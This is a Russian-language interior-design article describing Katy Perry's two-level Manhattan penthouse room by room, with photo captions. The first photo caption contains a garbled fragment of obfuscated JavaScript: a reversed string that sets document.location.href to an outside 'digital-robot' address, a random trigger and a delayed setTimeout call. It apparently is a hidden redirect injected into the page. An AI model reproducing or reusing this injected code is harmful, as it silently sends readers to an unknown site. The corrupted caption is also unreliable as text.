Добавить в закладки

Пентхаус Кэти Перри площадью 135 квадратных метров

Американская певица, композитор, актриса Кэти Перри часто меняет места проживания. Ее роскошная двухуровневая квартира в Нью-Йорке находится на Манхэттене. Из окон дома, площадью 135 квадратных метров, открывается вид на парковую зону и городские высотки. В доме есть гостиная, две спальни с прилегающими к ним уборными, кухня, столовая, терраса.

Кэти Пэрри

Кэти Пэрри. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}top.jpg»>images11.graziamagazine.ru

Прихожая

Интерьер дома наполнен деревянными элементами. При входе, в прихожей стоит угловая подставка из дерева с вмонтированными тумбами и навесными полками. В стене справа за дверью спрятан шкаф и антресольная полка, а рядом стоит диван с кованными перилами. Потолок обит балками.

Прихожая

Прихожая. Фото: uytvdome.ru

Гостиная

В гостиной белые стены скомбинированы с кирпичной кладкой. Потолок повторяет стиль коридора, а пол выложен ламинатом и прикрыт серым ковром. Несколько одностворчатых окон прикрываются рулонными шторами. У стены с картинами стоит белый диван. Рядом размещены подставки, столик из дерева со стеклянными вставками, пара кресел с серой обивкой, лежак у окна и несколько светильников. Комната украшена живописью и растениями.

Гостиная

Гостиная. Фото: uytvdome.ru

Столовая

Рядом находится столовая зона с выходом к лестнице, ведущей на второй этаж. Столовая выделена голубым ковром, на котором стоит стол из дерева. По кругу расставлены стулья с сидениями, обитыми серым велюром.

Столовая

Столовая. Фото: uytvdome.ru

Кухня

Обеденная зона плавно переходит на кухню. Здесь стоит гарнитур П-образной формы. Его фасады сделаны из стали со стеклом. Столешница и кухонный фартук из белого камня отлично сочетаются с деревянными колонами.

Кухня

Кухня. Фото: uytvdome.ru

Спальня

Спальня на мансардном этаже окружена окнами, поэтому наполнена светом. Из мебели в ней присутствует двуспальная кровать на деревянном каркасе и две прикроватные угловые тумбы с лампами.

Спальня

Спальня. Фото: uytvdome.ru

Уборная комната

Уборная облицована плиткой с каменной фактурой. Соответствует ей покрытие туалетного столика, в который вмонтирована раковина. На нем в качестве декора расставлены вазоны. К стене сверху крепится широкое зеркало.

Уборная комната

Уборная комната. Фото: uytvdome.ru

Уютный пентхаус отличное место для отдыха от насыщенных событиями рабочих дней популярной американской певицы.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 02.06.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: